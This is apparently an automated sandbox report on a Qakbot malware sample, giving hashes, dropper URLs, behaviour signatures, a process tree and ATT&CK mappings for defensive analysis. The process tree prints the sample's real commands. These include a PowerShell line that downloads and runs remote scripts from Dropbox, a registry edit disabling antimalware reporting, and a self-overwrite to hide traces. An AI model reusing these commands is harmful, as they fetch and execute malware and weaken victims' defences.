Analysis

  • max time kernel
    20s
  • max time network
    73s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    14-07-2022 03:44

General

  • Target
    4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe
  • Size
    616KB
  • MD5
    adab2a637738b6780e74b74dcabbb96f
  • SHA1
    0614b295d8f8486ea42c89be35b3e44926a943c0
  • SHA256
    4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4
  • SHA512
    72d5f1034bc442533403b836b5c47bbe2c895f2d32eadc1cbc3982b446eb011d871cc38b17ea471e8fe09a4c30f951f411004779fbc5f7fe87a663474be49b9d

Malware Config

Extracted

  • Language
    ps1
  • Deobfuscated
  • URLs
    ps1.dropper: https://www.dropbox.com/s/41zf98knyy5atko/001_01.ps1?dl=1
    ps1.dropper: https://www.dropbox.com/s/dh8flnrogfq1h1w/001.ps1?dl=1

Extracted

  • Family
    qakbot
  • Version
    322.368
  • Campaign
    1532427880

Credentials

C2

Signatures

  • Qakbot/Qbot
    Qbot or Qakbot is a sophisticated worm with banking capabilities.
  • Blocklisted process makes network request (1 IoC)
  • Executes dropped EXE (2 IoCs)
  • Checks computer location settings (2 TTPs, 1 IoC)
    Looks up country code configured in the registry, likely geofence.
  • Enumerates physical storage devices (1 TTP)
    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
  • Checks SCSI registry key(s) (3 TTPs, 12 IoCs)
    SCSI information is often read in order to detect sandboxing environments.
  • Runs ping.exe (1 TTP, 1 IoC)
  • Suspicious behavior: EnumeratesProcesses (28 IoCs)
  • Suspicious behavior: MapViewOfSection (1 IoC)
  • Suspicious use of AdjustPrivilegeToken (1 IoC)
  • Suspicious use of WriteProcessMemory (41 IoCs)

Processes

  • C:\Windows\system32\sihost.exe
    sihost.exe
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    PID:2272
  • C:\Windows\system32\DllHost.exe
    C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
    1⤵
    PID:3292
  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    PID:3084
  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    PID:2092
    • C:\Users\Admin\AppData\Local\Temp\4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe
      "C:\Users\Admin\AppData\Local\Temp\4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe"
      2⤵
      • Checks computer location settings
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:912
      • C:\Users\Admin\AppData\Local\Temp\4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe
        "C:\Users\Admin\AppData\Local\Temp\4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe" /C
        3⤵
        • Checks SCSI registry key(s)
        • Suspicious behavior: EnumeratesProcesses
        PID:1612
      • C:\Users\Admin\AppData\Roaming\Microsoft\Gwwusfxzw\gwwusfxz.exe
        C:\Users\Admin\AppData\Roaming\Microsoft\Gwwusfxzw\gwwusfxz.exe
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of WriteProcessMemory
        PID:4124
        • C:\Users\Admin\AppData\Roaming\Microsoft\Gwwusfxzw\gwwusfxz.exe
          "C:\Users\Admin\AppData\Roaming\Microsoft\Gwwusfxzw\gwwusfxz.exe" /C
          4⤵
          • Executes dropped EXE
          • Checks SCSI registry key(s)
          • Suspicious behavior: EnumeratesProcesses
          PID:4748
        • C:\Windows\SysWOW64\explorer.exe
          C:\Windows\SysWOW64\explorer.exe
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:5056
      • C:\Windows\system32\reg.exe
        C:\Windows\system32\reg.exe ADD "HKLM\SOFTWARE\Microsoft\Microsoft AntiMalware\SpyNet" /f /t REG_DWORD /v "SpyNetReporting" /d "0"
        3⤵
        PID:2132
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://www.dropbox.com/s/41zf98knyy5atko/001_01.ps1?dl=1'); IEX (New-Object Net.WebClient).DownloadString('https://www.dropbox.com/s/dh8flnrogfq1h1w/001.ps1?dl=1'); Invoke-MainWorker -Command 'C:\Users\Admin\AppData\Local\Temp\jaqhvnzhwhynhbmqqjwszaxuxcza.txt'"
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4584
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c ping.exe -n 6 127.0.0.1 & type "C:\Windows\System32\calc.exe" > "C:\Users\Admin\AppData\Local\Temp\4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:5044
        • C:\Windows\SysWOW64\PING.EXE
          ping.exe -n 6 127.0.0.1
          4⤵
          • Runs ping.exe
          PID:4640
  • C:\Windows\system32\taskhostw.exe
    taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    PID:2444
  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    PID:2288

MITRE ATT&CK Matrix (ATT&CK v6)

Discovery

  • T1012 Query Registry (2)
  • T1082 System Information Discovery (3)
  • T1120 Peripheral Device Discovery (1)
  • T1018 Remote System Discovery (1)

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Gwwusfxzw\gwwusfx.dat
    Filesize
    92B
    MD5
    afa2afe332d1e22d1f5d85be495d1693
    SHA1
    357d0f4d9c86fedd608edf1e172d974d8a9a7438
    SHA256
    79e02368bccfabdbee810fc90f7266baaf8031b31d21c80a4fab6f58fd85c2f2
    SHA512
    88c8e9e7900e0af1cc7e0bf8950400465929eb241292c596028a35e3bf78894ee890353581251f75d02d02f40154e0fecb834acb2acb34cb5cbdc32bf4beefef
  • C:\Users\Admin\AppData\Roaming\Microsoft\Gwwusfxzw\gwwusfxz.exe
    Filesize
    616KB
    MD5
    adab2a637738b6780e74b74dcabbb96f
    SHA1
    0614b295d8f8486ea42c89be35b3e44926a943c0
    SHA256
    4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4
    SHA512
    72d5f1034bc442533403b836b5c47bbe2c895f2d32eadc1cbc3982b446eb011d871cc38b17ea471e8fe09a4c30f951f411004779fbc5f7fe87a663474be49b9d

  • memory/912-130-0x0000000000400000-0x000000000049E000-memory.dmp
    Filesize
    632KB
  • memory/912-134-0x0000000000570000-0x0000000000576000-memory.dmp
    Filesize
    24KB
  • memory/1612-135-0x0000000000000000-mapping.dmp
  • memory/1612-140-0x0000000000530000-0x0000000000536000-memory.dmp
    Filesize
    24KB
  • memory/2092-170-0x0000000006F30000-0x0000000006F5C000-memory.dmp
    Filesize
    176KB
  • memory/2132-143-0x0000000000000000-mapping.dmp
  • memory/2272-167-0x0000000000C80000-0x0000000000CAC000-memory.dmp
    Filesize
    176KB
  • memory/2288-168-0x0000000000090000-0x00000000000BC000-memory.dmp
    Filesize
    176KB
  • memory/2444-169-0x0000000000420000-0x000000000044C000-memory.dmp
    Filesize
    176KB
  • memory/4124-141-0x0000000000000000-mapping.dmp
  • memory/4124-151-0x00000000006C0000-0x00000000006C6000-memory.dmp
    Filesize
    24KB
  • memory/4584-150-0x000002C8A7890000-0x000002C8A78B2000-memory.dmp
    Filesize
    136KB
  • memory/4584-152-0x00007FFBD3AA0000-0x00007FFBD4561000-memory.dmp
    Filesize
    10.8MB
  • memory/4584-149-0x0000000000000000-mapping.dmp
  • memory/4584-160-0x00007FFBD3AA0000-0x00007FFBD4561000-memory.dmp
    Filesize
    10.8MB
  • memory/4640-164-0x0000000000000000-mapping.dmp
  • memory/4748-159-0x00000000004E0000-0x00000000004E6000-memory.dmp
    Filesize
    24KB
  • memory/4748-153-0x0000000000000000-mapping.dmp
  • memory/5044-162-0x0000000000000000-mapping.dmp
  • memory/5056-165-0x0000000000F30000-0x0000000000F99000-memory.dmp
    Filesize
    420KB
  • memory/5056-166-0x00000000016A0000-0x00000000016CF000-memory.dmp
    Filesize
    188KB
  • memory/5056-161-0x0000000000000000-mapping.dmp